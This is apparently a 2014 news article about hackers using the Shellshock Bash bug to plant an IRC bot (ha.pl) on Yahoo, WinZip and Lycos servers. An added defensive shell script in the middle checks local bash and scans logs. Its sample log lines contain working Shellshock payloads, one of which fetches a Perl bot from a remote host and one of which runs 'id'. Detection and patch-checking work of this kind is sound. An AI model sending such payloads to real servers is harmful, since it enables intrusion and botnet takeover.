Romanian hackers seeking to build botnet of Unix hosts

Oct 6, 2014 14:00 GMT  ·  By

Hackers appearing to be of Romanian origin exploited the newly disclosed Bash vulnerability to compromise servers belonging to Yahoo, WinZip and Lycos, and used them to run a malicious Perl script that scanned for new victims.

Although the Shellshock vulnerability in Bash, the command interpreter shipped with most Linux and Unix systems, has been public since September 24 and patches are available (the first fix turned out to be incomplete and had to be followed by further updates), not every infrastructure has been patched, and threat actors keep looking for exposed systems to take over through it. The bug lets anyone who can get a crafted value into an environment variable, for instance through an HTTP header that a web server passes to a CGI script, run arbitrary commands on the host.

Cybercriminals gained complete control over two Yahoo servers

Security researcher Jonathan Hall of Future South Technologies discovered over the weekend that one of his machines, which he uses to observe Shellshock exploitation in the wild, had received a request from a WinZip server probing for common scripts in the cgi-bin directory, the usual way attackers locate CGI handlers that hand HTTP headers to Bash.
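As an added example, not part of the original article and not Hall's own tooling, the POSIX shell script below performs the two checks a server administrator would want after reading this: the widely circulated environment-variable test for the original Shellshock bug (CVE-2014-6271) against the locally installed bash, and a scan of web server access log lines for the `() {` function-definition prefix that every Shellshock payload has to carry, which is how cgi-bin probes like the one Hall's machine received show up in logs. The log lines are constructed for the example (documentation-range IP addresses, a payload that fetches a file named like the article's ha.pl), and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the article): two Shellshock checks.
#
# 1. shellshock_local_check: the well-known test for CVE-2014-6271.  A
#    vulnerable bash parses the environment variable value
#    "() { :;}; echo vulnerable" as a function definition and, while
#    importing it, also executes the trailing "echo vulnerable".
# 2. shellshock_log_hits / count_sample_hits: scan access-log lines for the
#    "() {" prefix every Shellshock payload needs.  Probes arrive in whatever
#    header the CGI handler exports as an environment variable, typically
#    User-Agent or Referer, both of which the Apache "combined" format logs.

# Matches "(){", "() {", "()  {" and similar spacing variants seen in the wild.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

shellshock_local_check() {
    # 0 = bash imports functions from arbitrary environment variables and
    #     runs trailing commands (vulnerable to CVE-2014-6271)
    # 1 = bash is patched for that bug (later variants need separate tests)
    # 2 = bash is not installed on this host
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

shellshock_log_hits() {
    # Reads log lines on stdin and prints the ones carrying a "() {" sequence.
    # "|| true" keeps a no-match result from counting as a script failure.
    grep -E "$SHELLSHOCK_RE" || true
}

sample_access_log() {
    # Constructed Apache "combined" format lines for this example only.
    # Addresses are from the RFC 5737 documentation ranges.  Lines 1 and 3
    # carry Shellshock payloads (in User-Agent and Referer respectively);
    # lines 2 and 4 are benign, and line 4 has "()" without a brace to show
    # that the pattern requires the function-definition prefix.
    cat <<'EOF'
203.0.113.5 - - [06/Oct/2014:13:58:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cd /tmp; wget http://198.51.100.7/ha.pl\""
203.0.113.9 - - [06/Oct/2014:13:58:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.22 - - [06/Oct/2014:13:59:12 +0000] "GET /cgi-bin/status HTTP/1.1" 404 209 "() { :; }; echo; /usr/bin/id" "curl/7.38.0"
203.0.113.9 - - [06/Oct/2014:13:59:40 +0000] "GET /cgi-bin/php?() HTTP/1.1" 404 209 "-" "Mozilla/5.0"
EOF
}

count_sample_hits() {
    # Number of constructed log lines that match the payload prefix.
    sample_access_log | grep -Ec "$SHELLSHOCK_RE" || true
}

# Stand-alone run: report the local bash status and the suspicious lines.
rc=0
shellshock_local_check || rc=$?
case "$rc" in
    0) echo "local bash: VULNERABLE to CVE-2014-6271" ;;
    1) echo "local bash: not vulnerable to CVE-2014-6271 (test later variants separately)" ;;
    *) echo "local bash: not installed" ;;
esac
echo "suspicious log lines: $(count_sample_hits)"
sample_access_log | shellshock_log_hits
```

Two caveats apply when using this on a real server. The environment-variable test only covers the original bug; the follow-up CVEs that the incomplete first patch left open need their own checks, so a "not vulnerable" result here is not proof that bash is fully fixed. And the log scan can only see headers the log format records: a payload sent in Cookie, Host or a custom header will reach the CGI script just the same but will not appear in a "combined" format access log, so absence of hits there is not absence of attempts.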

On closer investigation he found that the server itself had been compromised by a group of hackers, who had run a modified IRC DDoS bot script on it to obtain a reverse shell.

Hall noticed that all the hosts running the attackers' Perl script (ha.pl) were high-profile and included machines administered by Yahoo, WinZip and Lycos. The bot connects to an IRC server and joins the channel #bash, from which its operators issue commands.

He discovered that the hackers managed to gain complete control over two Yahoo servers (dip4.gq1.yahoo.com and api118.sports.gq1.yahoo.com) and that they were “digging through the network and traversing it piece by piece.”

The intruders' apparent goal was to compromise the Yahoo! Games servers, which are visited daily by millions of users who have Java installed in order to play the games. Java is a frequent target of client-side exploits, which would make those servers an attractive place from which to attack visitors.

Unfortunately for the researcher, his findings are not eligible for Yahoo's bug bounty program.

Server administrators have been contacted

Jonathan Hall was once a black hat hacker and was indicted, though never convicted. Having had that brush with law enforcement, he reported the intrusions not only to the affected parties but also to the FBI.

After trying to get in touch with Yahoo through conventional means, he proceeded to contact Marissa Mayer directly, both over Twitter and via email. He received an answer from Ricky Connell, security expert at Yahoo, who confirmed the presence of the dangerous code.

It appears that after gaining root access to the servers, the hackers installed malware to maintain control, but relied on old tools such as the kaiten.c IRC-controlled DDoS bot.

WinZip has also been contacted with details about their server being compromised through the Shellshock vulnerability, but Hall’s post has not been updated with an answer from the company.

The black hat turned security researcher said that, in WinZip's case, the compromised system was used "as a payment gateway for WinZip purchases," and in his letter to the company he warned that the entire customer payment database could be at risk.

It is worth noting that the servers attacked by the Romanian hackers were running unpatched versions of Bash.

[UPDATE, October 7]: After initially confirming Hall's finding, Yahoo revised its statement and said that the hackers, using a modified Shellshock exploit, had triggered a different bug that allowed them to compromise the servers.